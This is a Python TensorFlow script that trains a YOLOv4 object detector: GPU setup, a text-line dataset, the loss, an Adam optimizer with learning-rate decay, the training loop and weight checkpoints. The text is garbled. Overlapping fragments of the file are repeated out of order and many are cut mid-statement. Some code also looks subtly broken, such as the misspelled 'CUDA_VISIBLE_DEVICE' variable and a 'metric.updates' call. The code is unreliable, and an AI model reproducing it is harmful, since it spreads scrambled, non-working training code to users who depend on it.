\"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo", "设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") #", "from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S',", ": <EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================ import logging", "* from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS", "import logging import tensorflow as tf import os from src.yolo4.config import * from", "in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self):", "= txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return net def", "YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True )", "\"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary()", "if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1", "optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in", ": BaseModel.py # @Software: PyCharm # ============================================ import logging import tensorflow as tf", "train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch #", "print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch =", "%(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法:", "return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer", "= self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() #", "+ \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from", "# 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1,", "\"-1\" logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use cpu device\") #", "tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients,", "{:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch %", "= self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if", "in train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch =", "# -*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author :", "= YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self):", "1, train_epochs): step = 0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step +=", "step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0:", "0 for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data,", "from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() #", "# gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\"", "if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配 for", "gpu device,convert to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] =", "= process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss", "logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu", "image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch)", "init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标", "for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found", "/ batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path +", "fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else:", "%Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写,", "+ \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo =", "filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data", "txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net", "net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(", "# ============================================ import logging import tensorflow as tf import os from src.yolo4.config import", "= generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out)", "@Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================ import", "net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count /", "== 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ ==", "staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return", "Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data:", "device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] =", "# 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构", "= loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step:", "logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object):", "_ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def", "是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch =", "1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape()", "metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if", "import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import", "-*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email :", "%(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: '''", "= tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data: count += 1 train_data", "epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss", "label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch,", "PyCharm # ============================================ import logging import tensorflow as tf import os from src.yolo4.config", "train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch % save_frequency ==", "%d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self):", "def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True)", "count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS()", "net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss", "os from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET", "{} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数", "weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss =", "optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return", "print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer =", "= tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus", "= \"-1\" logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use cpu device\")", "+= 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET()", "+= 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with", "tf import os from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net", "YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule", ": xiao9616 # @Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm", "def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)", "{}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if", "save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__", "gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not", "from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a,", "as tf import os from src.yolo4.config import * from src.yolo4.util import * from", "return net def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule =", "return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU", "0 for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes =", "as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables)", "# @Email : <EMAIL> # @File : BaseModel.py # @Software: PyCharm # ============================================", "step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes)", "def loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001,", "\"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo = BaseModel()", "# ============================================= # -*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 #", "''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0", "optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置", "logging.info(\"use gpu device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else:", "fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() #", "模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch", "metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step", "logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count =", "= tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch,", "@Author : xiao9616 # @Email : <EMAIL> # @File : BaseModel.py # @Software:", "@File : BaseModel.py # @Software: PyCharm # ============================================ import logging import tensorflow as", "并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data: count", "@Time : 2020/5/14 上午10:50 # @Author : xiao9616 # @Email : <EMAIL> #", "-*- coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616", "BaseModel.py # @Software: PyCharm # ============================================ import logging import tensorflow as tf import", "else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use", "= \"-1\" # 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator()", "net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch", "# print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch", "boxes = parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape:", "in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch in train_dataset: #", "训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary() global fine_tune_epoch", "metric = tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu:", "# @File : BaseModel.py # @Software: PyCharm # ============================================ import logging import tensorflow", "txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data: count += 1", ": 2020/5/14 上午10:50 # @Author : xiao9616 # @Email : <EMAIL> # @File", "gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配 for gpu in", "%b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): '''", "model from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator()", "= parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out", "found gpu device,convert to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"]", "total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{},", "save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__': yolo = BaseModel() yolo.train()", "else: fine_tune_epoch = -1 print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator()", "tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self):", "tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data: count += 1 train_data =", "in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert", "src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d", "# 模型训练与更新 for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for", "设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric =", "for train_dataset_batch in train_dataset: # print(train_dataset_batch) step += 1 images, boxes = parse_dataset_batch(dataset=train_dataset_batch)", "gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format(", "count = 0 for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size)", "YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+') class", "BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path)", "return train_data, count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss", "loss_generator(self): loss = YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000,", "optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count", "-1 print(\"train model from init\") # 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer", "loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{}", "设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch", "* from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',", "return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\")", "use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配 for gpu", "tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu,", "net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs, step,", "from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG,", "train_data, count def net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss =", "for epoch in range(fine_tune_epoch + 1, train_epochs): step = 0 for train_dataset_batch in", "device,convert to use cpu\") else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\"", "gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert to", "epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf')", "tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch: {}/{}, step: {}/{} ,loss: {:.5f}\".format( epoch, train_epochs,", "from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import YOLO4_NET from", "generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients", "process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out = net(image_batch) total_loss =", "''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in", "data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _", "import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y %H:%M:%S', filename=\"./yolo4/logs/train.log\", filemode='w+')", "tf.keras.metrics.Mean() return metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus =", "GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\")", "= tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu device\") # gpu显存分配 for gpu in gpus:", "coding: utf-8 -*- # @Time : 2020/5/14 上午10:50 # @Author : xiao9616 #", "os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert to use cpu\") else: logging.info(\"use cpu", "net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return loss def", "decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric =", "# 训练数据 train_dataset, train_count = self.data_generator() # 网络结构 net = self.net_generator() net.summary() global", "loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer =", "metric.result() )) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf')", "optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric = tf.keras.metrics.Mean() return metric def", "import os from src.yolo4.config import * from src.yolo4.util import * from src.yolo4.Net import", "parse_dataset_batch(dataset=train_dataset_batch) image_batch = process_image_batch(images) label_batch = generate_label_batch(boxes) with tf.GradientTape() as tape: out =", "tf.GradientTape() as tape: out = net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss,", "tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert to use", "gpu device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"]", "global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune))", ")) metric.reset_states() if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path", "# @Author : xiao9616 # @Email : <EMAIL> # @File : BaseModel.py #", "net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss) print(\"Epoch:", "上午10:50 # @Author : xiao9616 # @Email : <EMAIL> # @File : BaseModel.py", "print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\") #", "= self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新 for epoch in range(fine_tune_epoch", ",loss: {:.5f}\".format( epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result() )) metric.reset_states() if epoch", "= net(image_batch) total_loss = loss(y_true=label_batch, y_pred=out) gradients = tape.gradient(total_loss, net.trainable_variables) optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables)) metric.updates(values=total_loss)", "if epoch % save_frequency == 0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs),", "0: net.save_weights(filepath=weights_path + \"epoch-{}\".format(epoch), save_format='tf') net.save_weights(filepath=weights_path + \"epoch-{}\".format(train_epochs), save_format='tf') if __name__ == '__main__':", "\"epoch-{}\".format(fine_tune_epoch)) print(\"load {} epoch weigth\".format(fine_tune)) else: fine_tune_epoch = -1 print(\"train model from init\")", "# GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use gpu", "# 设置loss损失函数 loss = self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric", "YOLO4_NET from src.yolo4.Loss import YOLO4_LOSS logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s', datefmt='%a, %d %b %Y", "metric def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if", "一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count =", "= tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def", "train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus: logging.info(\"use", "= YOLO4_LOSS() return loss def optimizer_generator(self): lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay( initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True", "else: logging.info(\"use cpu device\") # 禁用gpu os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" # 训练数据 train_dataset, train_count", "def train(self): # GPU 设置 tf.debugging.set_log_device_placement(True) if use_gpu: gpus = tf.config.experimental.list_physical_devices(device_type=\"GPU\") if gpus:", "self.loss_generator() # 设置优化器optimizer optimizer = self.optimizer_generator() # 设置评价指标 metric = self.metric_generator() # 模型训练与更新", "''' txt_data = tf.data.TextLineDataset(filenames=train_path) count = 0 for _ in txt_data: count +=", "def net_generator(self): net = YOLO4_NET() return net def loss_generator(self): loss = YOLO4_LOSS() return", "logging import tensorflow as tf import os from src.yolo4.config import * from src.yolo4.util", "1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net = YOLO4_NET() return", "# @Software: PyCharm # ============================================ import logging import tensorflow as tf import os", "''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 ''' txt_data = tf.data.TextLineDataset(filenames=train_path) count", "filename=\"./yolo4/logs/train.log\", filemode='w+') class BaseModel(object): ''' 一个自定义的类,需要重写方法: ''' def data_generator(self): ''' Returns:该方法可以重写, 并且返回一个tf.data对象 '''", "for _ in txt_data: count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count", "if gpus: logging.info(\"use gpu device\") # gpu显存分配 for gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True)", "initial_learning_rate=0.001, decay_steps=3000, decay_rate=0.96, staircase=True ) optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule) return optimizer def metric_generator(self): metric", "= self.net_generator() net.summary() global fine_tune_epoch # 是否finetune if fine_tune: net.load_weights(filepath=weights_path + \"epoch-{}\".format(fine_tune_epoch)) print(\"load", "count += 1 train_data = txt_data.batch(batch_size=batch_size) return train_data, count def net_generator(self): net =", "gpu in gpus: tf.config.experimental.set_memory_growth(device=gpu, enable=True) tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu", "tf.print(gpu) else: os.environ[\"CUDA_VISIBLE_DEVICE\"] = \"-1\" logging.info(\"not found gpu device,convert to use cpu\") else:", "train_count = self.data_generator() # 网络结构 net = self.net_generator() 